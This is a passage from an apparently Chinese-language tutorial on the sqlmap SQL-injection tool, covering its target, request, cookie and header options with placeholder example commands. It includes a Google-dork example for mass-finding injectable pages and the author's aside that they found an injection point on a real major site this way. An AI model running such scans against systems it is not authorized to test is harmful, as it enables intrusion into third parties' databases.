Roman';\">\u4e0b\u8f7d\u6700\u65b0\u7248\u672c<span>sqlmap<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e5f\u53ef\u4ee5\u4f7f\u7528<span>git<\/span><span>\u6765\u83b7\u53d6<\/span><span>sqlmap<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">git&nbsp;clone&nbsp;https:\/\/github.com\/sqlmapproject\/sqlmap.git&nbsp;sqlmap-dev<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e4b\u540e\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528\u547d\u4ee4\u6765\u66f4\u65b0<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;&#8211;update<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6216\u8005<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">git&nbsp;pull<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u66f4\u65b0<span>sqlmap<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u4f60\u60f3\u89c2\u5bdf<span>sqlmap<\/span><span>\u5bf9\u4e00\u4e2a\u70b9\u662f\u8fdb\u884c\u4e86\u600e\u6837\u7684\u5c1d\u8bd5\u5224\u65ad\u4ee5\u53ca\u8bfb\u53d6\u6570\u636e\u7684\uff0c\u53ef\u4ee5\u4f7f\u7528<\/span><span>-v<\/span><span>\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5171\u6709\u4e03\u4e2a\u7b49\u7ea7\uff0c\u9ed8\u8ba4\u4e3a<span>1<\/span><span>\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">0<span>\u3001\u53ea\u663e\u793a<\/span><span>python<\/span><span>\u9519\u8bef\u4ee5\u53ca\u4e25\u91cd\u7684\u4fe1\u606f\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">1<span>\u3001\u540c\u65f6\u663e\u793a\u57fa\u672c\u4fe1\u606f\u548c\u8b66\u544a\u4fe1\u606f\u3002\uff08\u9ed8\u8ba4\uff09<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">2<span>\u3001\u540c\u65f6\u663e\u793a<\/span><span>debug<\/span><span>\u4fe1\u606f\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">3<span>\u3001\u540c\u65f6\u663e\u793a\u6ce8\u5165\u7684<\/span><span>payload<\/span><span>\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">4<span>\u3001\u540c\u65f6\u663e\u793a<\/span><span>HTTP<\/span><span>\u8bf7\u6c42\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">5<span>\u3001\u540c\u65f6\u663e\u793a<\/span><span>HTTP<\/span><span>\u54cd\u5e94\u5934\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">6<span>\u3001\u540c\u65f6\u663e\u793a<\/span><span>HTTP<\/span><span>\u54cd\u5e94\u9875\u9762\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u4f60\u60f3\u770b\u5230<span>sqlmap<\/span><span>\u53d1\u9001\u7684\u6d4b\u8bd5<\/span><span>payload<\/span><span>\u6700\u597d\u7684\u7b49\u7ea7\u5c31\u662f<\/span><span>3<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E8%8E%B7%E5%8F%96%E7%9B%AE%E6%A0%87%E6%96%B9%E5%BC%8F\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u83b7\u53d6\u76ee\u6807\u65b9\u5f0f<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E7%9B%AE%E6%A0%87URL\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u76ee\u6807URL<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-u<\/span><span>\u6216\u8005<\/span><span>&#8211;url<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u683c\u5f0f\uff1a<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">http(s):\/\/targeturl[:port]\/[\u2026]<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/www.target.com\/vuln.php?id=1&#8221;&nbsp;-f&nbsp;&#8211;banner&nbsp;&#8211;dbs&nbsp;&#8211;users<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4ece<span>Burp<\/span><span>\u6216\u8005<\/span><span>WebScarab<\/span><span>\u4ee3\u7406\u4e2d\u83b7\u53d6\u65e5\u5fd7<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-l<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u76f4\u63a5\u5427<span>Burp&nbsp;proxy<\/span><span>\u6216\u8005<\/span><span>WebScarab&nbsp;proxy<\/span><span>\u4e2d\u7684\u65e5\u5fd7\u76f4\u63a5\u5012\u51fa\u6765\u4ea4\u7ed9<\/span><span>sqlmap<\/span><span>\u6765\u4e00\u4e2a\u4e00\u4e2a\u68c0\u6d4b\u662f\u5426\u6709\u6ce8\u5165\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BB%8E%E6%96%87%E6%9C%AC%E4%B8%AD%E8%8E%B7%E5%8F%96%E5%A4%9A%E4%B8%AA%E7%9B%AE%E6%A0%87%E6%89%AB%E6%8F%8F\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4ece\u6587\u672c\u4e2d\u83b7\u53d6\u591a\u4e2a\u76ee\u6807\u626b\u63cf<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-m<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6587\u4ef6\u4e2d\u4fdd\u5b58<span>url<\/span><span>\u683c\u5f0f\u5982\u4e0b\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u4e00\u4e2a\u4e00\u4e2a\u68c0\u6d4b<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">www.target1.com\/vuln1.php?q=foobar<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">www.target2.com\/vuln2.asp?id=1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">www.target3.com\/vuln3\/id\/1*<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BB%8E%E6%96%87%E4%BB%B6%E4%B8%AD%E5%8A%A0%E8%BD%BDHTTP%E8%AF%B7%E6%B1%82\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4ece\u6587\u4ef6\u4e2d\u52a0\u8f7dHTTP\u8bf7\u6c42<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-r<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u53ef\u4ee5\u4ece\u4e00\u4e2a\u6587\u672c\u6587\u4ef6\u4e2d\u83b7\u53d6<\/span><span>HTTP<\/span><span>\u8bf7\u6c42\uff0c\u8fd9\u6837\u5c31\u53ef\u4ee5\u8df3\u8fc7\u8bbe\u7f6e\u4e00\u4e9b\u5176\u4ed6\u53c2\u6570\uff08\u6bd4\u5982<\/span><span>cookie<\/span><span>\uff0c<\/span><span>POST<\/span><span>\u6570\u636e\uff0c\u7b49\u7b49\uff09\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6bd4\u5982\u6587\u672c\u6587\u4ef6\u5185\u5982\u4e0b\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">POST&nbsp;\/vuln.php&nbsp;HTTP\/1.1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Host:&nbsp;www.target.com<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">User-Agent:&nbsp;Mozilla\/4.0<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">id=1<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u8bf7\u6c42\u662f<span>HTTPS<\/span><span>\u7684\u65f6\u5019\u4f60\u9700\u8981\u914d\u5408\u8fd9\u4e2a<\/span><span>&#8211;force-ssl<\/span><span>\u53c2\u6570\u6765\u4f7f\u7528\uff0c\u6216\u8005\u4f60\u53ef\u4ee5\u5728<\/span><span>Host<\/span><span>\u5934\u540e\u95e8\u52a0\u4e0a<\/span><span>:443<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%A4%84%E7%90%86Google%E7%9A%84%E6%90%9C%E7%B4%A2%E7%BB%93%E6%9E%9C\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5904\u7406Google\u7684\u641c\u7d22\u7ed3\u679c<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-g<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u53ef\u4ee5\u6d4b\u8bd5\u6ce8\u5165<\/span><span>Google<\/span><span>\u7684\u641c\u7d22\u7ed3\u679c\u4e2d\u7684<\/span><span>GET<\/span><span>\u53c2\u6570\uff08\u53ea\u83b7\u53d6\u524d<\/span><span>100<\/span><span>\u4e2a\u7ed3\u679c\uff09\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-g&nbsp;&#8220;inurl:\\&#8221;.php?id=1\\&#8221;&#8221;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\uff08\u5f88\u725b<span>B<\/span><span>\u7684\u529f\u80fd\uff0c\u6d4b\u8bd5\u4e86\u4e00\u4e0b\uff0c\u7b2c\u5341\u51e0\u4e2a\u5c31\u627e\u5230\u65b0\u6d6a\u7684\u4e00\u4e2a\u6ce8\u5165\u70b9\uff09<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6b64\u5916\u53ef\u4ee5\u4f7f\u7528<span>-c<\/span><span>\u53c2\u6570\u52a0\u8f7d<\/span><span>sqlmap.conf<\/span><span>\u6587\u4ef6\u91cc\u9762\u7684\u76f8\u5173\u914d\u7f6e\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E8%AF%B7%E6%B1%82\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u8bf7\u6c42<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"http%E6%95%B0%E6%8D%AE\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">http\u6570\u636e<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;data<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6b64\u53c2\u6570\u662f\u628a\u6570\u636e\u4ee5<span>POST<\/span><span>\u65b9\u5f0f\u63d0\u4ea4\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u50cf\u68c0\u6d4b<\/span><span>GET<\/span><span>\u53c2\u6570\u4e00\u6837\u68c0\u6d4b<\/span><span>POST<\/span><span>\u7684\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/www.target.com\/vuln.php&#8221;&nbsp;&#8211;data=&#8221;id=1&#8243;&nbsp;-f&nbsp;&#8211;banner&nbsp;&#8211;dbs&nbsp;&#8211;users<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%8F%82%E6%95%B0%E6%8B%86%E5%88%86%E5%AD%97%E7%AC%A6\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u53c2\u6570\u62c6\u5206\u5b57\u7b26<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;param-del<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53<span>GET<\/span><span>\u6216<\/span><span>POST<\/span><span>\u7684\u6570\u636e\u9700\u8981\u7528\u5176\u4ed6\u5b57\u7b26\u5206\u5272\u6d4b\u8bd5\u53c2\u6570\u7684\u65f6\u5019\u9700\u8981\u7528\u5230\u6b64\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/www.target.com\/vuln.php&#8221;&nbsp;&#8211;data=&#8221;query=foobar;id=1&#8243;&nbsp;&#8211;param-del=&#8221;;&#8221;&nbsp;-f&nbsp;&#8211;banner&nbsp;&#8211;dbs&nbsp;&#8211;users<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"HTTP_cookie%E5%A4%B4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">HTTP&nbsp;cookie\u5934<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;cookie,&#8211;load-cookies,&#8211;drop-set-cookie<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd9\u4e2a\u53c2\u6570\u5728\u4ee5\u4e0b\u4e24\u4e2a\u65b9\u9762\u5f88\u6709\u7528\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">1<span>\u3001<\/span><span>web<\/span><span>\u5e94\u7528\u9700\u8981\u767b\u9646\u7684\u65f6\u5019\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">2<span>\u3001\u4f60\u60f3\u8981\u5728\u8fd9\u4e9b\u5934\u53c2\u6570\u4e2d\u6d4b\u8bd5<\/span><span>SQL<\/span><span>\u6ce8\u5165\u65f6\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u901a\u8fc7\u6293\u5305\u628a<span>cookie<\/span><span>\u83b7\u53d6\u5230\uff0c\u590d\u5236\u51fa\u6765\uff0c\u7136\u540e\u52a0\u5230<\/span><span>&#8211;cookie<\/span><span>\u53c2\u6570\u91cc\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5728<span>HTTP<\/span><span>\u8bf7\u6c42\u4e2d\uff0c\u9047\u5230<\/span><span>Set-Cookie<\/span><span>\u7684\u8bdd\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u81ea\u52a8\u83b7\u53d6\u5e76\u4e14\u5728\u4ee5\u540e\u7684\u8bf7\u6c42\u4e2d\u52a0\u5165\uff0c\u5e76\u4e14\u4f1a\u5c1d\u8bd5<\/span><span>SQL<\/span><span>\u6ce8\u5165\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u4f60\u4e0d\u60f3\u63a5\u53d7<span>Set-Cookie<\/span><span>\u53ef\u4ee5\u4f7f\u7528<\/span><span>&#8211;drop-set-cookie<\/span><span>\u53c2\u6570\u6765\u62d2\u63a5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u4f60\u4f7f\u7528<span>&#8211;cookie<\/span><span>\u53c2\u6570\u65f6\uff0c\u5f53\u8fd4\u56de\u4e00\u4e2a<\/span><span>Set-Cookie<\/span><span>\u5934\u7684\u65f6\u5019\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u8be2\u95ee\u4f60\u7528\u54ea\u4e2a<\/span><span>cookie<\/span><span>\u6765\u7ee7\u7eed\u63a5\u4e0b\u6765\u7684\u8bf7\u6c42\u3002\u5f53<\/span><span>&#8211;level<\/span><span>\u7684\u53c2\u6570\u8bbe\u5b9a\u4e3a<\/span><span>2<\/span><span>\u6216\u8005<\/span><span>2<\/span><span>\u4ee5\u4e0a\u7684\u65f6\u5019\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u5c1d\u8bd5\u6ce8\u5165<\/span><span>Cookie<\/span><span>\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"HTTP_User-Agent%E5%A4%B4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">HTTP&nbsp;User-Agent\u5934<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;user-agent,&#8211;random-agent<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b<span>sqlmap<\/span><span>\u7684<\/span><span>HTTP<\/span><span>\u8bf7\u6c42\u5934\u4e2d<\/span><span>User-Agent<\/span><span>\u503c\u662f\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">sqlmap\/1.0-dev-xxxxxxx&nbsp;(http:\/\/sqlmap.org)<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u4f7f\u7528<span>&#8211;user-anget<\/span><span>\u53c2\u6570\u6765\u4fee\u6539\uff0c\u540c\u65f6\u4e5f\u53ef\u4ee5\u4f7f\u7528<\/span><span>&#8211;random-agnet<\/span><span>\u53c2\u6570\u6765\u968f\u673a\u7684\u4ece<\/span><span>.\/txt\/user-agents.txt<\/span><span>\u4e2d\u83b7\u53d6\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53<span>&#8211;level<\/span><span>\u53c2\u6570\u8bbe\u5b9a\u4e3a<\/span><span>3<\/span><span>\u6216\u8005<\/span><span>3<\/span><span>\u4ee5\u4e0a\u7684\u65f6\u5019\uff0c\u4f1a\u5c1d\u8bd5\u5bf9<\/span><span>User-Angent<\/span><span>\u8fdb\u884c\u6ce8\u5165\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"HTTP_Referer%E5%A4%B4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">HTTP&nbsp;Referer\u5934<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;referer<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New 